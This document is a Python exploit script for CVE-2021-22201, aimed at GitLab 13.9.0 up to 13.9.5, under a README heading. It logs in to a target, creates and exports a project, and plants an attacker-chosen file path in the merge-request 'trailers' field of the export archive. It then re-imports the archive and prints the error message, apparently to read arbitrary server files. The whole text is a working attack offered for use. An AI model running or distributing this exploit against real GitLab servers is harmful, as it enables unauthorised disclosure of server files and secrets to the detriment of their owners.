README.md
Rendering markdown...
import os
import re
import sys
import tarfile
import requests
from json import loads
from uuid import uuid1
from time import sleep
from shutil import rmtree
LOGIN_URI = '/users/sign_in'
CREATE_URI = '/projects/new'
IMPORT_API = '/api/v4/projects/%s/import'
PROJECT_URI = '/%s/'
NEW_PROJECT = '/projects/new'
BRANCH_URI = '/%s/%s/-/branches/new'
PATH = os.path.dirname(__file__)
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
}
proxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
session = requests.session()
base_url = None
token = None
namespace_id = None
project_name = None
project_id = None
branch_name = None
token_reg = re.compile(r'name="authenticity_token" value="(?P<token>.*?)"')
project_reg = re.compile(r'.*?ID: (\d+)')
def banner():
print("""
---------- CVE-2021-22201 ----------
---------- 13.9.0 <= Gitlab < 13.9.5
---------- Author: Search?=Null ----
Usage: python3 CVE-2021-22201.py url username password
""")
def get_token(uri, regex = False):
"""
获取csrf-token
"""
global token
url = base_url + uri
req = session.get(url, headers = HEADERS)
req_text = req.text
try:
if not regex:
token = token_reg.search(req_text).group('token')
else:
token = re.search(regex, req_text).group(1)
print(f'[+] Get token: {token}')
except AttributeError:
print('[-] Line 60 Failed to obtain token.')
sys.exit(0)
except Exception as e:
print(f'[-] Line 63 Error: {e}')
def login(user, pass_):
"""
登录
"""
url = base_url + LOGIN_URI
get_token(LOGIN_URI)
data = {
'utf8': '✓',
'authenticity_token': token,
'user[login]': user,
'user[password]': pass_,
'user[remember_me]': 0
}
try:
req = session.post(url, headers = HEADERS, data = data, allow_redirects = False)
if req.status_code == 302 and 'redirected' in req.text:
print('[+] Login Success.')
elif req.status_code == 200 and 'Invalid Login or password' in req.text:
print('[-] Line 83: Invalid Login or password.')
except Exception as e:
print('[-] Line 85 Login failed. ' + str(e))
create_project()
def create_project():
"""
创建项目, 项目名采用随机字符
"""
global PROJECT_URI
global project_name
global project_id
global namespace_id
url = base_url + CREATE_URI[:9]
get_token(CREATE_URI)
project_name = str(uuid1())[:8]
r = session.get(base_url + CREATE_URI, headers = HEADERS)
namespace_id = re.search(r'<input value="(\d+)" type="hidden" name="project\[namespace_id\]" id="project_namespace_id"', r.text).group(1)
data = {
'utf8': '✓',
'authenticity_token': token,
'project[ci_cd_only]': 'false',
'project[name]': project_name,
'project[namespace_id]': namespace_id,
'project[path]': project_name,
'project[description]': project_name,
'project[visibility_level]': 20,
'project[initialize_with_readme]': 1
}
try:
req = session.post(url, headers = HEADERS, data = data, allow_redirects = False)
if req.status_code == 302 and 'redirected' in req.text:
print(f'[+] Create project {project_name} success.')
get_project_id(project_name)
except Exception as e:
print(f'[-] Line 118 ERROR: {e}.')
create_branch()
def get_project_id(project_name):
url = base_url + PROJECT_URI % (username) + project_name
try:
req_project = session.get(url, headers = HEADERS)
project_id = project_reg.search(req_project.text).group(1)
print(f'[+] Project {project_name} ID: {project_id}')
return project_id
except Exception as e:
print(f'[-] Line 129 Error: {e}')
def create_branch():
"""
创建分支
"""
global branch_name
uri = BRANCH_URI % (username, project_name)
get_token(uri)
url = (base_url + uri).replace('/new', '')
branch_name = str(uuid1())[:8]
data = {
'utf8': '✓',
'authenticity_token': token,
'branch_name': branch_name,
'ref': 'master'
}
try:
req = session.post(url, headers = HEADERS, data = data, allow_redirects = False)
if req.status_code == 302 and 'redirected' in req.text:
print(f'[+] Create branch {branch_name} success.')
except Exception as e:
print(f'[-] Line 151 Error: {e}')
newfile_uri = f'/{username}/{project_name}/new/{branch_name}/'
get_token(newfile_uri)
create_file(f'/{username}/{project_name}/-/create/{branch_name}')
def create_file(uri):
"""
新分支添加文件
"""
url = base_url + uri
filename = str(uuid1())[:8]
data = {
'utf8': '✓',
'authenticity_token': token,
'file_name': filename,
'commit_message': 'Add+new+file',
'branch_name': branch_name,
'original_branch': branch_name,
'content': str(uuid1())
}
try:
req = session.post(url, headers = HEADERS, data = data, allow_redirects=False)
if req.status_code == 302 and 'redirected' in req.text:
print(f'[+] Create file {filename} success.')
except Exception as e:
print(f'[-] Line 177 Error: {e}.')
merge_request()
def merge_request():
"""
添加PR合并请求
"""
uri = PROJECT_URI % (username) + project_name + '/-/merge_requests/new'
# print(uri)
get_token(uri, r'name="csrf-token" content="(.*?)"')
params = {
'utf8': '✓',
'merge_request[source_project_id]': project_id,
'merge_request[source_branch]': branch_name,
'merge_request[target_project_id]': project_id,
'merge_request[target_branch]': 'master'
}
try:
req = session.get(base_url + uri, headers = HEADERS, params = params)
diff_head_sha = re.search(r'name="merge_request_diff_head_sha" id="merge_request_diff_head_sha" value="(.*?)"', req.text).group(1)
except Exception as e:
print(f'[-] Line 198 Error: {e}')
sys.exit(0)
merge_url = base_url + uri.replace('/new', '')
data = {
'utf8': '✓',
'authenticity_token': token,
'merge_request[title]': 'Add new file',
'merge_request_diff_head_sha': diff_head_sha,
'merge_request[description]': '',
'merge_request[assignee_ids][]': 0,
'merge_request[reviewer_ids][]': 0,
'merge_request[label_ids][]': '',
'merge_request[force_remove_source_branch]': 0,
'merge_request[force_remove_source_branch]': 1,
'merge_request[squash]': 0,
'merge_request[lock_version]': 0,
'merge_request[source_project_id]': project_id,
'merge_request[source_branch]': branch_name,
'merge_request[target_project_id]': project_id,
'merge_request[target_branch]': 'master'
}
try:
merge_req = session.post(merge_url, headers = HEADERS, data = data, allow_redirects = False)
if merge_req.status_code == 302 and 'redirected' in merge_req.text:
print('[+] Merge request success.')
except Exception as e:
print(f'[-] Line 189 Error: {e}')
sys.exit(0)
export_project()
def export_project():
"""
导出项目
"""
uri = PROJECT_URI % (username) + project_name + '/edit'
get_token(uri)
data = {
'_method': 'POST',
'authenticity_token': token
}
url = base_url + uri.replace('edit', 'export')
try:
req = session.post(url, headers = HEADERS, data = data, allow_redirects = False)
if req.status_code == 302 and 'redirected' in req.text:
print('[+] Export project success.')
# 延时两秒后下载导出的压缩包
sleep(5)
except Exception as e:
print(f'[-] Line 246 Error: {e}')
download_export()
def download_export():
url = base_url + PROJECT_URI % (username) + project_name + '/download_export'
filename = f'{username}_{project_name}_export.tar.gz'
try:
req = session.get(url, headers = HEADERS)
with open(os.path.join(PATH, filename), 'wb') as fp:
fp.write(req.content)
print(f'[+] Download {filename} success.')
except Exception as e:
print(f'[-] Line 258 Error: {e}')
delete_project(project_name)
add_payload(os.path.join(PATH, filename))
def delete_project(name):
uri = PROJECT_URI % (username) + name
get_token(uri)
url = base_url + uri
data = {
'_method': 'delete',
'authenticity_token': token
}
try:
req = session.post(url, headers = HEADERS, data = data, allow_redirects = False)
if req.status_code == 302 and 'redirected' in req.text:
print(f'[+] Delete project {name} success.')
except Exception as e:
print(f'[-] Line 275 Error: {e}')
def add_payload(filepath):
payload = input('file > ')
try:
output_path = os.path.join(PATH, 'export')
if not os.path.exists(output_path):
t = tarfile.open(filepath)
os.mkdir(output_path)
t.extractall(path = output_path)
t.close()
file_path = os.path.join(output_path, 'tree', 'project', 'merge_requests.ndjson')
with open(file_path, 'r') as f:
content = re.sub(r'"trailers":.*?}]', '"trailers":"%s"}]' % payload, f.read())
with open(file_path, 'w+') as fp:
fp.write(content)
# with tarfile.open(os.path.join(PATH, 'payload.tar.gz'), 'w:gz') as tar:
payload_file = tarfile.open(os.path.join(PATH, 'payload.tar.gz'), 'w:gz')
payload_file.add(output_path, arcname = '.')
payload_file.close()
print('[+] Add payload success.')
os.remove(filepath)
except Exception as e:
print(f'[-] Line 298 Error: {e}')
import_project()
def import_project():
get_token(NEW_PROJECT)
url = base_url + '/import/gitlab_project'
name = str(uuid1())[:8]
data = {
'utf8': '✓',
'authenticity_token': token,
'name': name,
'namespace_id': namespace_id,
'path': name,
}
f = open(os.path.join(PATH, 'payload.tar.gz'), 'rb')
project_file = {'file': f}
try:
req = session.post(url, headers = HEADERS, data = data, files = project_file)
if req.status_code == 302 and 'redirected' in req.text:
print('[+] Uploaded project success.')
except Exception as e:
print(f'[-] Line 319 Error: {e}')
f.close()
sleep(5)
id_ = get_project_id(name)
url = base_url + IMPORT_API % (str(id_))
try:
r = session.get(url, headers = HEADERS)
if r.status_code == 200 and 'JSON::Schema::JsonParseError' in r.text:
content = loads(r.text)
except Exception as e:
print(f'[-] Line 329 Error: {e}')
delete_project(name)
print('\n\n' + content['failed_relations'][0]['exception_message'] + '\n\n')
delete_all()
def delete_all():
try:
os.unlink(os.path.join(PATH, 'payload.tar.gz'))
print('[+] Deleteed file payload.tar.gz success.')
rmtree(os.path.join(PATH, 'export'), ignore_errors = True)
print('[+] Deleteed dir export succcess.')
except Exception as e:
print(f'[-] Line 342 Error: {e}')
def main():
banner()
if len(sys.argv) < 4:
sys.exit(0)
else:
global username
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
if not url.startswith('http://') or not url.startswith('https://'):
global base_url
base_url = 'http://' + url.rstrip('/')
# print(url)
login(username, password)
if __name__ == '__main__':
main()